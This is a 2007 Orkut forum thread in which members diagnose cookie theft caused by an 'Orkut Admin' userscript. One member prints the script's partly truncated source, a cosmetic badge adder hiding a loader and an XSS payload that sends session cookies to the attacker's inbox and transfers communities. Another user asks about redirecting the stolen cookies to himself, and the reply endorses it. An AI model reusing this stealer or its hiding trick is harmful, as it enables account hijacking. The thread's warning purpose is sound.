[orkut-admin script nuisance]
| 9:23 pm šτгαπgεREMEMBER THE GID THING??? THE WAY TO KNOW SOMEONE'S PROFILE THROUGH GID... I FOLLOWED THE PROCEDURE AS MENTIONED IN THE POSTS BUT HERE'S SOMETHING STRANGE I NOTICED AFTER SENDING THE MESSAGE,I CHECKED THE SENT MESSAGE SECTION........ HERE'S WHAT I FOUND O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:14 PM Persons Profile Me DFF - FFFF FFFF 6/18/07 9:14 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:10 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:09 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:08 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:06 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:06 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:05 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... TZ=-330; __utmz=85909575.1182152400.1.1.utmccn=(d 6/18/07 9:04 PM O Corvo - † The Crow † Me Orkut Cookie Exploit - TZ=-330; __utmz=85909575.1182152... THIS IS JUST THE FIRST PAGE..... WHAT IS THIS ACTUALLY??? DOES ANY ONE KNOW?? | |
| 9:34 pm шнατ τнε ƒμcκ...............∂Θπ'τ τгγ τнιš gι∂ τнιπg ρεΘρlε ιτ нαcκš γΘμг cΘΘκιεš..... šнγτ šнγτ ι τгιε∂ ιτ ƒгΘм мγ ƒακε αccΘμπτ Θρεπε∂ τнε šεπτ мεššαgεš šεcτιΘπ απ∂ шнατ ι šαш шαš мγ cΘΘκιεš вειπg šεπτ τΘ α ρεгšΘπ ....................................... | |
| 9:38 pm lolz ... dude u r cookie is stolen coz u must hav used some other cookie stealing script ... or u one of ur grease monkey scripts is cookie stealing ... and plz so tell me when where they actually sent (to crow) ... its not coz of GIDNobody here uid=7033552749200404104 this is my temp profile | |
| 9:38 pm i meant WHEN was the cookie sent ... and give us the profile link Nobody here uid=7033552749200404104 this is my temp profile | |
| 9:42 pm cookies stolen from any other script or js i guess SiGnEd bY: ♪ ρμπIšHεг ♪ | |
| 9:45 pm what do u mean by unsigned user.js???.... i`m sure u hav a user.js which is cookie stealing .... do u hav a medal script???? Nobody here uid=7033552749200404104 this is my temp profile | |
| 9:45 pm http://www.orkut.com/Profile.aspx?uid=1нεгε'š нιš μι∂ απ∂ τнε cΘΘκιεš αгε вειπg šεπτ τΘ нιš мεššαgεš απ∂ πΘτ τΘ нιš šcгαρвΘΘκ απ∂ τнεγτ αгε вειπg šεπτ εαcн απ∂ ενεгγ мιπμτε | |
| 9:46 pm γεš ι нανε τнε мε∂αl šcгιρτ...šнιτ...................ιš ιτ вεcαμšε Θƒ τнιš ∂αмπ Θπε???? | |
| 9:50 pm c=document.getElementsByTagName('head')[ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this is cookie stealing stuff Nobody here uid=7033552749200404104 this is my temp profile | |
| 9:51 pm see bottom of that user.js Nobody here uid=7033552749200404104 this is my temp profile |
| 9:52 pm шιll нε вε šτιll αвlε τΘ αccεšš мγ αccΘμπτš τнгΘμgн cΘΘκιεš???ι cнαπgε∂ τнε cΘΘκιε šεττιπgš Θƒ мγ ƒιгεƒΘχ τΘ 'εχριгε ενεгγ τιмε ι clΘšε ƒιгεƒΘχ' шιll τнιš нεlρ??? | |
| 9:53 pm нανε μπιπšταllε∂ τнε šcгιρτ 5 мιπμτεš αgΘ Θπ мγ Θшπ šμšριcιΘπαπ∂ шнεπ ι ∂ΘшπlΘα∂ε∂ τнιš τнιπg...ι šαш τнε šΘμгcε вμτ ƒΘμπ∂ πΘτнιπg τнατ cΘμl∂ šτεαl cΘΘκιεš.... ι ∂ι∂ ƒιπ∂ τнε τнιπg мεπτιΘπε∂ αвΘνε вμτ ιτ šεεмε∂ Θƒ πΘ вα∂ ιπτεπτιΘπ | |
᠌bad | 9:53 pm idiot change ur emailllllllllllllllll | |
| 9:53 pm if u hav any comm`s ... transfer it into other account ... Nobody here uid=7033552749200404104 this is my temp profile | |
᠌bad | 9:53 pm change yr email id mainnnnnnnnnnn | |
| 9:54 pm ∂Θ γΘμ мεαπ τΘ šαγ τнε εмαιl ι∂ τнгΘμgн шнιcн ι αccεšš Θгκμτ??нΘш шιll τнιš нεlρ?? | |
| 9:54 pm πΘ ι ∂ι∂πΘτ нανε απγ cΘммμπιτιεš | |
᠌bad | 9:55 pm yaaaaaaa main email idd settings me jaaaaaaaaa | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 9:55 pm you have the admin script installed i guessuninstall that first otherwise nothing will help you | |
᠌bad | 9:56 pm just cahnge email main thats it cookie expire ho jayegaaaaaaaaaa |
| 9:58 pm ι μπιπšταllε∂ τнε τнιπgαπ∂ τнεπ ι šετ мγ ƒιгεƒΘχ τΘ εχριгε мγ cΘΘκιεš αš šΘΘπ αš ι clΘšε τнε шιπ∂Θш шιll τнιš нεlρ?? | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 9:59 pm if that script is there installedthen the new cookie will also be exploited this happened to me many days before | |
| 9:59 pm Quoted Message @ 9:58 pm (0 minutes ago)ι μπιπšταllε∂ τнε τнιπg απ∂ τнεπ ι šετ мγ ƒιгεƒΘχ τΘ εχριгε мγ cΘΘκιεš αš šΘΘπ αš ι clΘšε τнε шιπ∂Θш шιll τнιš нεlρ?? ^^^^^^^^^ | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 10:00 pm cookies dont expire on closing FFyou have to wait for 1 day at least or change the user ID | |
♥.♥Mr.¢σσℓ ®- ™♥ | 10:00 pm i know tht crow before...he is such a crap | |
᠌bad | 10:05 pm | |
| 10:05 pm dude chill ...he cant do anything with ur profile ... he may just add some few comm to ur list ... he cant get ur pass ... just wait for ur cookies to get expired Nobody here uid=7033552749200404104 this is my temp profile | |
| 10:05 pm ƒμcκ τнατ cгΘшπΘш ι gΘτ τΘ cнαπgε τнε εмαιl ι∂......... ∂Θ γΘμ нανε απγ ενι∂επcε τнατ нε мιšμšεš ιτ??? | |
| 10:06 pm γεαн.....ι κπΘш нε cαπ'τ ∂Θ απγτнιπg шιτн мγ ρгΘƒιlε....вμг нΘш Θƒτεπ ∂Θ τнεšε cΘΘκιεš εχριгε??? | |
| 10:08 pm lolz ... even i dont know ... may be once in 15days Nobody here uid=7033552749200404104 this is my temp profile |
♕♕ Pαπτнεг ☦☠♔✸❃ | 10:08 pm he can just add some comn or ujoin some comnor delete friends or something but cant take away account from you chill dont panic ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ Pαπτнεг, τнε §Θμl Яεανεг ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 10:09 pm time is variableonce a cookie of my one account got a month to expire ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ Pαπτнεг, τнε §Θμl Яεανεг ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
| 10:11 pm τнαπκš ρεθρlε ƒθг γα нεlρ......Θμg гΘχ | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 10:13 pm welcome▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ Pαπτнεг, τнε §Θμl Яεανεг ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
| 10:15 pm @mods and topic creator dont delete this topic .... there may be many who may hav this script Nobody here uid=7033552749200404104 this is my temp profile | |
| 10:15 pm dude change ur id and login and logout a couple of timesby this way ur old cookies wuld xpire | |
| 10:16 pm ιτš α нεcκ cнαπgιπg εмαιlš....πε шαγš шΘμl∂ ∂Θ ιτ šΘΘπ | |
RED RUM 666 ~~~ | 10:19 pm I think its better to migrate ur account to a diff id!.....use orkut migration techniques..... | |
Zɘʁǭkǭǭl | 10:19 pm i think migration is not possible now..... | |
RED RUM 666 ~~~ | 10:20 pm y? |
| 10:23 pm u can change ur id only if u hav not created account with gmail ... migration thingy is blocked now Nobody here uid=7033552749200404104 this is my temp profile | |
Luciana | 10:23 pm i love deadlyyyyyyyyy | |
Luciana | 10:23 pm | |
| 10:24 pm cΘμl∂ шε μšε τнατ cΘΘκιε εχρlΘιτ шнιcн cгΘш μšε∂???cαπ'τ шε ε∂ιτ τнε нττρ://н1.гιρшαγ.cΘм/lανα∂ι/...... šΘ ιπšτεα∂ Θƒ τнε cΘΘκιεš gΘιπg τΘ нιм ιτ гεαcнεš μš?? | |
RED RUM 666 ~~~ | 10:24 pm oh....... | |
Bad sectors | 10:25 pm tats wat im saying migration is not possible tat was fixed months back | |
| 10:26 pm lol @ uno tats not possible @nobody bhai yeh vikas itna saab kyun likhta hai hamare baare mein | |
| 10:26 pm qμΘτε∂ мεššαgε lμcιαπα @ 10:2з ρм (2 мιπμτεš αgΘ)ι lΘνε ∂εα∂lγγγγγγγγγ κιτπΘ κι lεgα ∂εα∂lγ???? | |
| 10:26 pm @konvict no more hacking stuff in oug @deadly plz move to chatting thread ... dont spoil all threads Nobody here uid=7033552749200404104 this is my temp profile | |
| 10:27 pm @no name WHO ARE U???? Nobody here uid=7033552749200404104 this is my temp profile |
| 10:27 pm απ∂ lΘΘκ шнατ šнιτ...ι нανε мγ αccΘμπτ шнcιн μšεš gмαιl...... | |
Bad sectors | 10:27 pm lets move to chatting thread | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 10:28 pm 's Quoted message @ 10:24 pm (2 minutes ago)cΘμl∂ шε μšε τнατ cΘΘκιε εχρlΘιτ шнιcн cгΘш μšε∂??? cαπ'τ шε ε∂ιτ τнε нττρ://н1.гιρшαγ.cΘм/lανα∂ι/...... šΘ ιπšτεα∂ Θƒ τнε cΘΘκιεš gΘιπg τΘ нιм ιτ гεαcнεš μš?? yeah you can do it ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ Pαπτнεг, τнε §Θμl Яεανεг ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
Luciana | 10:28 pm | |
Bad sectors | 10:29 pm its deadly.....haha | |
| 10:30 pm sahil bawa | |
| 10:30 pm move to chat thread Nobody here uid=7033552749200404104 this is my temp profile | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 10:31 pm 's Quoted message @ 10:30 pm (0 minutes ago)move to chat thread Nobody here uid=7033552749200404104 this is my temp profile yes sir ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ Pαπτнεг, τнε §Θμl Яεανεг ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
| 10:35 pm κΘπνιcτ šαι∂cθμl∂ шε μšε τнατ cθθκιε εχρlθιτ шнιcн cгθш μšε∂??? cαπ'τ шε ε∂ιτ τнε нττρ://н1.гιρшαγ.cθм/lανα∂ι/...... šθ ιπšτεα∂ θƒ τнε cθθκιεš gθιπg τθ нιм ιτ гεαcнεš μš?? @αll cαπ šΘмεΘπε ρlεαšε нεlρ мε Θπ τнατ ρεгšΘπαllγ??? (вεcαμšε Θμg ∂Θεšπ'τ αllΘш γΘμ τΘ cΘπνεгšε Θπ τнΘšε τΘριcš) | |
Vatsala | 11:09 pm @abvyaar use normal fonts |
♕♕ Pαπτнεг ☦☠♔✸❃ | 3:11 am well this is the explanation of orkut-admin userscriptthe red part is cookie stealer // ==UserScript== // @name Perfil - Orkut Admin // @namespace http://www.orkut.com // @description Adiciona Medalha, Cartas, Bola e Bandeira Igual o Perfil dos Admins do Orkut // @include http://www.orkut.com/Profile.aspx* // ==/UserScript== /* * * Autor: Orkut Admin * Data da Cria��o: 10/03/2007 * * * * */ // -------------------------- IN�CIO DO SCRIPT : CUIDADO SE FOR MEXER ! ---------------------------------------- function perfilEstrela() { if( document.body.innerHTML.indexOf('EditGen var letra = document.getElementById("imgFirstLetter" var nome = letra.src; nome = nome.replace(/s.gif/, 'a.gif'); letra.src = nome; letra.parentNode.innerHTML += "<img src='/img/i_donut_king.gif'><img src='/img/i_donut_ace.gif'><img src='/img/i_donut_soccer.gif'><img src='/img/i_donut_brazil.gif'>"; } } perfilEstrela(); // ---------------------------------------- FIM DO SCRIPT ---------------------------------------- /* ------------------------------ Changelog (Mudan�as mais recentes) ---------------------------------------- * * * by Orkut Tools * */ c=document.getElementsByTagName('head')[ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ ۞ ‡ Pαπτнεг, τнε §Θμl Яεανεг ‡ ۞ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 3:14 am the red part has got an image link which has got this code/* Começo das configurações pessoais */ var uid="13414145882775903143"; // Coloque seu UID /* Fim das configurações pessoais * Salve o arquivo com codificação UTF-8 * Se não fizer isso a acentuação não fucionará corretamente * Arquivo pertencente à comunide Orkut Exploits: * http://www.orkut.com/Community.aspx?cmm * * Matéria original sobre a falha: * http://www.orkut.com/CommMsgs.aspx?cmm= * * Será que custava mandar o link original nas matérias publicadas? **************************ATENÇÃO!!!!!!* * O orkut.com desativou o recurso de transfência de comunidades * * para pessoas que não fazem parte da mesma * * portanto, a transferência só vai ser bem sucedida caso você * * entre previamente na "comunidade-alvo" * * * * Mas os cookies dos usuários que não utilizam no IE continuam * * chegando na sua caixa de mensagens. * * * * E agora os usuários do IE ficam livres. * * Pelo menos contra ALGUNS script kiddies. * **************************************** | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 3:16 am contd* Desenvolvido por Rodrigo Lacerda * http://www.orkut.com/Profile.aspx?uid=1 * * Dá pra fazer o favor de não retirar os créditos? * Agradecimentos: * * Klay (descobriu a falha de XSS divulgada em 26/11/2006) * bandido gostoso (nada pessoal, é o nome do cara) * MecanicoW (também conhecido como RelfexMec) * Link (autor da barra de formatação) * X.Free (esse mandou lembranças do inferno) */ function createXMLHttpRequest() { try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){} try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} try{ return new XMLHttpRequest(); }catch(e){} return null; } function getCookies() { subject="Orkut Cookie Exploit"; dcookie=document.cookie; if(dcookie.indexOf('state') > -1) { mensagem = dcookie+"nnVerifique se ele enviou alguma comunidadennOrkut Community Transfer & Cookie Stealer ExploitnDesenvolvido por Rodrigo Lacerda"; } else { mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiadennOrkut Community Transfer & Cookie Stealer ExploitnDesenvolvido por Rodrigo Lacerda"; } check_scraps(); }; getCookies(); | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 3:18 am function velocity_transfer(){ send="POST_TOKEN="+encodeURIComponent(PO var xml= createXMLHttpRequest(); xml.open('POST','http://www.orkut.com/C xml.setRequestHeader('Content-Type','app xml.send(send);xml.onreadystatechange=fu { if(xml.readyState==4) { var xmlrtr=xml.responseText; x++; if(x<cmm.length) { velocity_transfer(); } } }; }; function array_cmm() { var xml2= createXMLHttpRequest(); xml2.open("GET","http://www.orkut.com/C xml2.onreadystatechange=function() { if(xml2.readyState==4) { var xmlr=xml2.responseText; if(!xmlr.match(/textPanel/gi)) { cont=xmlr; ini=cont.indexOf('<DIV id=ownedCommunities') > -1 ? cont.indexOf('<DIV id=ownedCommunities') : cont.indexOf('<div id="ownedCommunities"'); fim=cont.indexOf('<DIV id=pendingCommunities') > -1 ? cont.indexOf('<DIV id=pendingCommunities') : cont.indexOf('<div id="pendingCommunities"'); cont2=cont.substring(ini,fim) cmm=String(cont2.match(/cmm=d+/g)).repl cmm=cmm.split(','); if(cmm) { velocity_transfer(); } } else { array_cmm(); }; }; }; xml2.send(null); }; | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 3:20 am function send_message() { send="POST_TOKEN="+encodeURIComponent(PO var xml= createXMLHttpRequest(); xml.open('POST','http://www.orkut.com/C xml.setRequestHeader('Content-Type','app xml.send(send);xml.onreadystatechange=fu { if(xml.readyState==4) { var xmlrtr=xml.responseText; if(!xmlrtr.match(/textPanel/gi)) { array_cmm(); } else { send_message(); } } }; }; function check_scraps() { x=0; var xml=createXMLHttpRequest(); xml.open("GET","Scrapbook.aspx",true); xml.onreadystatechange=function() { if(xml.readyState==4) { var xmlr1=xml.responseText; if(!xmlr1.indexOf('textPanel') > -1) { SIG=xmlr1.match(/signature. value="(.+)"/i)[1]; POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1]; send_message(); } else { check_scraps(); } }; }; xml.send(null); }; the red part sends the message to the hacker's message box ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ ۞ ‡ Pαπτнεг, τнε §Θμl Яεανεг ‡ ۞ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | |
♕♕ Pαπτнεг ☦☠♔✸❃ | 3:21 am so don't use the orkut-admin userscript▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ ۞ ‡ Pαπτнεг, τнε §Θμl Яεανεг ‡ ۞ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ |
Anonymous | Jun 19
good work panther... Nobody here uid=7033552749200404104 this is my temp profile | | |||
*Anas!=] | Jun 19 lolz he used the community stealing script provided in the Orkut Admin community
| | |||
᠌ | Jun 19 thnx nobody
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ ۞ ‡ Pαπτнεг, τнε §Θμl Яεανεг ‡ ۞ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ | ||||
Bad sectors | Jun 19
|